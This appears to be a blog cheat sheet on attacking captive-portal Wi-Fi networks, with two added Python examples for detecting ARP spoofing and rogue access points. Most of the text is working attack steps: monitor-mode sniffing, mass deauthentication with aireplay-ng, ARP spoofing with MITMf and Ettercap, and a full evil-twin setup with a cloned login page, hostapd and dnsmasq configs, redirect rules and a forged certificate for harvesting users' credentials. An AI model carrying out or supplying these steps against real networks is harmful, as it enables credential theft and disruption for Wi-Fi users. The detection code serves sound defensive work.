Hacking and PenTesting Captive Portal Enabled Wireless Networks

Hello all, this is a simple cheat sheet for hacking/pentesting captive-portal-enabled wireless (Wi-Fi) networks.


Before starting the attack, it is recommended to change your device's MAC address.

Sniffing Captive Portal Login Information using monitor mode

#Enabling Monitor Mode
#Check the interface name and update it accordingly  
ifconfig 
ifconfig wlan0 down 
iwconfig wlan0 mode monitor 
ifconfig wlan0 up 

#Start sniffing and de-auth the user so that we can sniff the traffic
airodump-ng wlan0
airodump-ng --bssid routermac --channel 12 --write filename wlan0
aireplay-ng --deauth 1000 -a routermac -c clientmac wlan0

#Open the captured file in Wireshark and view the contents. If the captive portal uses HTTP, you can get the plain-text password
filters: "http", "post", frame contains user

Sniffing Captive Portal Login Information using ARP Spoofing

#Find your gateway address
ip r

#Start the attack using MITMf
mitmf --arp --spoof -i wlan0 --gateway 192.168.2.1

#Start Attack using Ettercap
ettercap -Tq -M arp:remote -i wlan0
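
Seen from a client or a monitoring host, ARP spoofing of the gateway shows up in the neighbor table: the gateway IP starts resolving to a different MAC, usually one that also answers for another host. The Python check below is an added example, not part of the original cheat sheet; the `ip neigh` snapshots and MAC addresses are constructed, and 192.168.2.1 is the gateway address used above.

```python
import re
from collections import defaultdict

# Constructed `ip neigh` snapshots: a known-good baseline and a later reading.
BASELINE = """\
192.168.2.1 dev wlan0 lladdr 02:00:00:00:00:01 REACHABLE
192.168.2.23 dev wlan0 lladdr 02:00:00:00:00:17 STALE
"""
CURRENT = """\
192.168.2.1 dev wlan0 lladdr 02:00:00:00:00:17 REACHABLE
192.168.2.23 dev wlan0 lladdr 02:00:00:00:00:17 STALE
192.168.2.40 dev wlan0 FAILED
"""

NEIGH_RE = re.compile(r"^(\S+) dev \S+ lladdr ([0-9A-Fa-f:]{17})\b")

def parse_neigh(text):
    """Return {ip: mac} for entries that carry a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries have no lladdr and are skipped
            table[m.group(1)] = m.group(2).lower()
    return table

def arp_findings(baseline, current, gateway):
    """Compare two snapshots and report signs of gateway ARP spoofing."""
    base, cur = parse_neigh(baseline), parse_neigh(current)
    findings = []
    # Sign 1: the gateway's MAC differs from the recorded baseline.
    if gateway in base and gateway in cur and base[gateway] != cur[gateway]:
        findings.append(("gateway-mac-changed",
                         f"{base[gateway]} -> {cur[gateway]}"))
    # Sign 2: the MAC now answering for the gateway also owns another IP.
    by_mac = defaultdict(list)
    for ip, mac in cur.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if gateway in ips and len(ips) > 1:
            findings.append(("mac-shared-with-gateway",
                             f"{mac} claims {', '.join(sorted(ips))}"))
    return findings

if __name__ == "__main__":
    for kind, detail in arp_findings(BASELINE, CURRENT, "192.168.2.1"):
        print(kind, detail)
```

On the network side, Dynamic ARP Inspection on switches or client isolation on the access point keeps spoofed replies from reaching other clients in the first place.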

Sniffing Captive Portal Login Information using Social Engineering

Follow the process below, or you can go through an Evil Twin attack via Linset

#Create a fake Captive Portal Page
--> open the captive portal, then right click --> save page as --> save the html page
--> go to "/var/www/html" and paste the saved html pages and files
--> change the main page to index.html
--> start the web server #service apache2 start
--> apt-get install geany  (optional)
--> open the index.html page in a text editor and fix relative URLs
--> add a "/" before the link <link href="/sd/sd/s/style.css"
--> make sure the input boxes are inside a "form" tag; if not, add it manually <form> </form>
--> <form method="post" action="/index.html"> inputs and login </form>
--> add a submit button or text to receive  <input type="submit" value="Log in">
--> add a button with the same style

#Creating a Fake AP with Same name
Requirements: 
1. A router broadcasting signal --> wifi card with hostapd
2. A DHCP server to give IPs to clients --> use dnsmasq
3. A DNS server to handle DNS requests --> use dnsmasq

apt-get install hostapd dnsmasq	
ifconfig 
service network-manager stop 
--> network is disabled
--> OPTIONAL (CLEARING IPTABLES) 
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT 

--> need a dnsmasq.conf file 
#set the wifi interface 
interface=wlan0

#set the IP range that can be given to clients
dhcp-range=10.0.0.10,10.0.0.100,8h

#set the gateway IP address
dhcp-option=3,10.0.0.1

#Set dns server address
dhcp-option=6,10.0.0.1

#Redirect all requests to 10.0.0.1
address=/#/10.0.0.1

--> save it as dnsmasq.conf

--> we need a hostapd.conf file as well

#set wifi interface 
interface=wlan0

#set network name
ssid=Network Name 2

#set channel 
channel=1

#set driver
driver=nl80211

--> save it as hostapd.conf

dnsmasq -C /root/downloads/dnsmasq.conf

--> -B to run it in the background

hostapd -B /root/downloads/hostapd.conf

ifconfig wlan0 10.0.0.1 netmask 255.255.255.0
service apache2 start 
leafpad /etc/apache2/sites-enabled/000-default.conf
--> need to add a rule so that any page accessed is redirected to our address
--> type the following in the 000-default.conf file. This is done to redirect any request for a www website to the same website without www
--> after <VirtualHost *:80> type the following
	ErrorDocument 404 /

--> after </VirtualHost> type
<VirtualHost *:443>
	SSLEngine On
	SSLCertificateFile /root/Downloads/cert.pem
	SSLCertificateKeyFile /root/Downloads/cert.key
</VirtualHost>

<Directory "/var/www/html"> 
	RewriteEngine On 
	RewriteBase /
	RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]
	RewriteRule ^(.*)$ http://%1/$1 [R=301,L]
	#this is for iPhones/smartphones, to redirect 404 pages to the web root
	RewriteCond %{REQUEST_FILENAME} !-f
	RewriteCond %{REQUEST_FILENAME} !-d
	RewriteRule ^(.*)$ / [L,QSA]
</Directory>
--> save this file 
service apache2 restart

#Create an SSL cert for HTTPS captive portals
openssl req -new -x509 -days 365 -out cert.pem -keyout cert.key
--> enter a password and hit enter
--> it asks for the country name: set it according to your country, e.g. "EU"
--> State: name
--> City: Name
--> company: Microsoft
--> Unit Name: Networking
--> Common Name: Wifi Name
--> Email: Email
--> Certificate should have been created ...

--> to enable SSL on apache
a2enmod ssl 
leafpad /etc/apache2/ports.conf

#add this line to ports.conf and save the file
Listen 443

#restart the service
service apache2 restart 

#De-authenticate the users from the original network
airodump-ng --bssid routermac --channel number mon0
aireplay-ng --deauth 100000 -a routermac mon0

#Start Sniffing the traffic
#update the interface accordingly
tshark -i wlan0 -w filename.cap

#Once you think the user is logged in, open the file in Wireshark and go through the traffic
#if the traffic is encrypted, as you have the cert, you can decrypt and view the data
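
A cloned-SSID access point like the one configured above advertises the portal's network name from a BSSID, and often a channel, that the real infrastructure does not use, so a routine site survey can catch it. This added Python example (not from the original post) checks a constructed capture in airodump-ng's CSV layout against a hypothetical inventory of sanctioned APs; the SSID, the BSSIDs and the `AUTHORIZED` table are assumptions.

```python
import csv

# Constructed sample in the layout of an airodump-ng --write CSV file.
SCAN_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:AA:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 12, 54, OPN, , , -48, 300, 0, 0.0.0.0, 10, Guest-WiFi,
02:00:00:EE:00:99, 2024-01-01 10:03:10, 2024-01-01 10:05:01, 1, 54, OPN, , , -30, 120, 0, 0.0.0.0, 10, Guest-WiFi,
02:00:00:BB:00:02, 2024-01-01 10:00:00, 2024-01-01 10:05:02, 6, 54, WPA2, CCMP, PSK, -70, 90, 0, 0.0.0.0, 9, CoffeeBar,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:CC:00:03, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -55, 40, 02:00:00:AA:00:01,
"""

# Hypothetical inventory: ESSID -> {BSSID: (channel, privacy)} of sanctioned APs.
AUTHORIZED = {"Guest-WiFi": {"02:00:00:AA:00:01": (12, "OPN")}}

def parse_aps(text):
    """Return the AP rows as dicts; the station section after the blank line is ignored."""
    ap_lines = []
    for line in text.strip().splitlines():
        if not line.strip():
            break
        ap_lines.append(line)
    reader = csv.reader(ap_lines, skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    return [dict(zip(header, (c.strip() for c in row))) for row in reader]

def rogue_candidates(text, authorized):
    """Flag APs that use one of our SSIDs but do not match the inventory."""
    findings = []
    for ap in parse_aps(text):
        known = authorized.get(ap["ESSID"])
        if known is None:
            continue  # not one of the SSIDs we are responsible for
        bssid = ap["BSSID"].upper()
        observed = (int(ap["channel"]), ap["Privacy"])
        if bssid not in known:
            findings.append((bssid, "unlisted BSSID advertising " + ap["ESSID"]))
        elif known[bssid] != observed:
            # Same BSSID but different channel/privacy suggests a spoofed BSSID.
            findings.append((bssid, "listed BSSID with unexpected channel/privacy"))
    return findings

if __name__ == "__main__":
    for bssid, reason in rogue_candidates(SCAN_CSV, AUTHORIZED):
        print(bssid, reason)
```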





Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.
